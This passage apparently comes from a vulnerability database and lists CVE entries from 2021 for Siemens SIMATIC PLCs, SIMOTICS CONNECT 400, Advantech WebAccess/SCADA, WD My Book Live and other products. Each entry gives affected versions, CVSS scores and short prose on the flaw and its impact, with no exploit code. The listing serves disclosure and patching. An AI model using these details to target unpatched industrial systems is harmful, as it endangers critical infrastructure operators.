A vulnerability has been identified in SIMATIC Drive Controller family (All versions < V2.9.2), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) (All versions < V21.9), SIMATIC S7 PLCSIM Advanced (All versions > V2 < V4), SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (Version V4.4), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants) (All versions > V2.5 < V2.9.2), SIMATIC S7-1500 Software Controller (All versions > V2.5 < V21.9), TIM 1531 IRC (incl. SIPLUS NET variants) (Version V2.1). Due to an incorrect authorization check in the affected component, an attacker could extract information about access-protected PLC program variables over port 102/tcp from an affected device when reading multiple attributes at once. Multiple Siemens products contain an improper authorization vulnerability through which information may be obtained. Siemens SIMATIC S7-1500 CPU and SIMATIC S7-1500 are products of Siemens of Germany. The SIMATIC S7-1500 CPU is a CPU (Central Processing Unit) module. The SIMATIC S7-1500 is a programmable logic controller.
VAR-202108-1313 CVE-2021-33717 NULL pointer dereference vulnerability in JT2Go and Teamcenter Visualization CVSS V2: 4.3
CVSS V3: 5.5
Severity: MEDIUM
A vulnerability has been identified in JT2Go (All versions < V13.2.0.1), Teamcenter Visualization (All versions < V13.2.0.1). When parsing specially crafted CGM files, a NULL pointer dereference condition could cause the application to crash. The application must be restarted to restore the service. An attacker could leverage this vulnerability to cause a denial-of-service condition in the application. JT2Go and Teamcenter Visualization contain a NULL pointer dereference vulnerability and may be put into a denial-of-service (DoS) state.
VAR-202108-0791 CVE-2021-32943 Multiple vulnerabilities in Advantech WebAccess/SCADA CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code on the WebAccess/SCADA (WebAccess/SCADA versions prior to 8.4.5, WebAccess/SCADA versions prior to 9.0.1). WebAccess/SCADA, provided by Advantech, is a browser-based SCADA software package. WebAccess/SCADA contains the following multiple vulnerabilities: cross-site scripting (CWE-79) - CVE-2021-22676; relative path traversal (CWE-23) - CVE-2021-22674; stack-based buffer overflow (CWE-121) - CVE-2021-32943. The expected impact depends on each vulnerability, but may be as follows: when crafted JavaScript code is sent by a remote third party, cookie/session tokens may be hijacked, the user may be redirected to a malicious website, or the web browser may be manipulated unintentionally - CVE-2021-22676; a remote third party may access the product's files and directories without authentication - CVE-2021-22674; arbitrary code may be executed by a remote third party - CVE-2021-32943. A buffer overflow vulnerability exists in Advantech WebAccess/SCADA that stems from the product's failure to properly validate data boundaries; an attacker can use this vulnerability to cause a stack-based buffer overflow.
VAR-202108-0261 CVE-2021-22674 Multiple vulnerabilities in Advantech WebAccess/SCADA CVSS V2: 4.0
CVSS V3: 6.5
Severity: MEDIUM
The affected product is vulnerable to a relative path traversal condition, which may allow an attacker access to unauthorized files and directories on the WebAccess/SCADA (WebAccess/SCADA versions prior to 8.4.5, WebAccess/SCADA versions prior to 9.0.1). WebAccess/SCADA, provided by Advantech, is a browser-based SCADA software package. WebAccess/SCADA contains the following multiple vulnerabilities: cross-site scripting (CWE-79) - CVE-2021-22676; relative path traversal (CWE-23) - CVE-2021-22674; stack-based buffer overflow (CWE-121) - CVE-2021-32943. The expected impact depends on each vulnerability, but may be as follows: when crafted JavaScript code is sent by a remote third party, cookie/session tokens may be hijacked, the user may be redirected to a malicious website, or the web browser may be manipulated unintentionally - CVE-2021-22676; a remote third party may access the product's files and directories without authentication - CVE-2021-22674; arbitrary code may be executed by a remote third party - CVE-2021-32943. A path traversal vulnerability exists in Advantech WebAccess/SCADA that stems from the product's failure to properly validate input data.
VAR-202108-0721 CVE-2021-25659 Resource exhaustion vulnerability in Automation License Manager CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
A vulnerability has been identified in Automation License Manager 5 (All versions), Automation License Manager 6 (All versions < V6.0 SP9 Update 2). Sending specially crafted packets to port 4410/tcp of an affected system could lead to extensive memory being consumed and as such could cause a denial-of-service preventing legitimate users from using the system. Automation License Manager contains a resource exhaustion vulnerability and may be put into a denial-of-service (DoS) state. An attacker can exploit the vulnerability to cause a denial of service and prevent legitimate users from using the system.
VAR-202108-0262 CVE-2021-22676 Multiple vulnerabilities in Advantech WebAccess/SCADA CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
UserExcelOut.asp within WebAccess/SCADA is vulnerable to cross-site scripting (XSS), which could allow an attacker to send malicious JavaScript code. This could result in hijacking of cookie/session tokens, redirection to a malicious webpage, and unintended browser action on the WebAccess/SCADA (WebAccess/SCADA versions prior to 8.4.5, WebAccess/SCADA versions prior to 9.0.1). WebAccess/SCADA, provided by Advantech, is a browser-based SCADA software package. WebAccess/SCADA contains the following multiple vulnerabilities: cross-site scripting (CWE-79) - CVE-2021-22676; relative path traversal (CWE-23) - CVE-2021-22674; stack-based buffer overflow (CWE-121) - CVE-2021-32943. The expected impact depends on each vulnerability, but may be as follows: when crafted JavaScript code is sent by a remote third party, cookie/session tokens may be hijacked, the user may be redirected to a malicious website, or the web browser may be manipulated unintentionally - CVE-2021-22676; a remote third party may access the product's files and directories without authentication - CVE-2021-22674; arbitrary code may be executed by a remote third party - CVE-2021-32943. A cross-site scripting vulnerability exists in Advantech WebAccess/SCADA, which stems from UserExcelOut.asp failing to properly validate user-supplied data. An attacker could use this vulnerability to hijack cookie/session tokens and execute client-side code.
VAR-202106-1091 CVE-2021-35941 Unspecified vulnerability in Western Digital WD My Book Live CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Western Digital WD My Book Live (2.x and later) and WD My Book Live Duo (all versions) have an administrator API that can perform a system factory restore without authentication, as exploited in the wild in June 2021, a different vulnerability than CVE-2018-18472. Western Digital WD My Book Live is a network-attached storage device from Western Digital. The vulnerability stems from the product's administrator API, which attackers can use to perform a system factory restore without authentication.
VAR-202104-0340 CVE-2021-22669 Incorrect permission assignment for a critical resource in Advantech WebAccess/SCADA CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
Incorrect permissions are set by default on the 'Project Management' page of the WebAccess/SCADA portal of WebAccess/SCADA Versions 9.0.1 and prior, which may allow a low-privileged user to update an administrator's password and log in as an administrator to escalate privileges on the system. WebAccess/SCADA, provided by Advantech, is a browser-based SCADA software package. Advantech WebAccess/SCADA is a set of SCADA software based on a browser architecture. The software supports dynamic graphic display and real-time data control, and provides functions for remote control and management of automation equipment. Advantech WebAccess/SCADA-IIoT is a web application developed by Advantech, Taiwan, China. There is a security vulnerability in WebAccess/SCADA.
VAR-202104-1826 CVE-2020-27736 Siemens SIMOTICS CONNECT 400 Denial of Service Vulnerability CVSS V2: 5.8
CVSS V3: 6.5
Severity: MEDIUM
A vulnerability has been identified in APOGEE PXC Compact (BACnet) (All versions < V3.5.5), APOGEE PXC Compact (P2 Ethernet) (All versions < V2.8.20), APOGEE PXC Modular (BACnet) (All versions < V3.5.5), APOGEE PXC Modular (P2 Ethernet) (All versions < V2.8.20), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions < V2017.02.3), Nucleus ReadyStart V4 (All versions < V4.1.0), Nucleus Source Code (Versions including affected DNS modules), SIMOTICS CONNECT 400 (All versions < V0.5.0.0), TALON TC Compact (BACnet) (All versions < V3.5.5), TALON TC Modular (BACnet) (All versions < V3.5.5). The DNS domain name label parsing functionality does not properly validate the null-terminated name in DNS responses. The parsing of malformed responses could result in a read past the end of an allocated structure. An attacker with a privileged position in the network could leverage this vulnerability to cause a denial-of-service condition or leak the read memory. SIMOTICS CONNECT 400 is a connector and sensor box installed on a low-voltage motor that provides analysis data for the MindSphere application SIDRIVE IQ Fleet.
VAR-202104-1825 CVE-2020-27737 Siemens SIMOTICS CONNECT 400 out-of-bounds read vulnerability CVSS V2: 5.8
CVSS V3: 6.5
Severity: MEDIUM
A vulnerability has been identified in APOGEE PXC Compact (BACnet) (All versions < V3.5.5), APOGEE PXC Compact (P2 Ethernet) (All versions < V2.8.20), APOGEE PXC Modular (BACnet) (All versions < V3.5.5), APOGEE PXC Modular (P2 Ethernet) (All versions < V2.8.20), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions < V2017.02.3), Nucleus ReadyStart V4 (All versions < V4.1.0), Nucleus Source Code (Versions including affected DNS modules), SIMOTICS CONNECT 400 (All versions < V0.5.0.0), TALON TC Compact (BACnet) (All versions < V3.5.5), TALON TC Modular (BACnet) (All versions < V3.5.5). The DNS response parsing functionality does not properly validate the various lengths and counts of the records. The parsing of malformed responses could result in a read past the end of an allocated structure. An attacker with a privileged position in the network could leverage this vulnerability to cause a denial-of-service condition or leak the memory past the allocated structure. SIMOTICS CONNECT 400 is a connector and sensor box installed on a low-voltage motor that provides analysis data for the MindSphere application SIDRIVE IQ Fleet. Siemens SIMOTICS CONNECT 400 has an out-of-bounds read vulnerability.
VAR-202104-1829 CVE-2021-25677 Siemens SIMOTICS CONNECT 400 unspecified vulnerability CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
A vulnerability has been identified in APOGEE PXC Compact (BACnet) (All versions < V3.5.5), APOGEE PXC Compact (P2 Ethernet) (All versions < V2.8.20), APOGEE PXC Modular (BACnet) (All versions < V3.5.5), APOGEE PXC Modular (P2 Ethernet) (All versions < V2.8.20), Nucleus NET (All versions), Nucleus ReadyStart V3 (All versions < V2017.02.3), Nucleus ReadyStart V3 (All versions < V2017.02.4), Nucleus ReadyStart V4 (All versions < V4.1.0), Nucleus Source Code (Versions including affected DNS modules), SIMOTICS CONNECT 400 (All versions < V0.5.0.0), SIMOTICS CONNECT 400 (All versions >= V0.5.0.0 < V1.0.0.0), TALON TC Compact (BACnet) (All versions < V3.5.5), TALON TC Modular (BACnet) (All versions < V3.5.5). The DNS client does not properly randomize DNS transaction IDs. That could allow an attacker to poison the DNS cache or spoof DNS resolution. SIMOTICS CONNECT 400 is a connector and sensor box installed on a low-voltage motor that provides analysis data for the MindSphere application SIDRIVE IQ Fleet. Siemens SIMOTICS CONNECT 400 has a security vulnerability.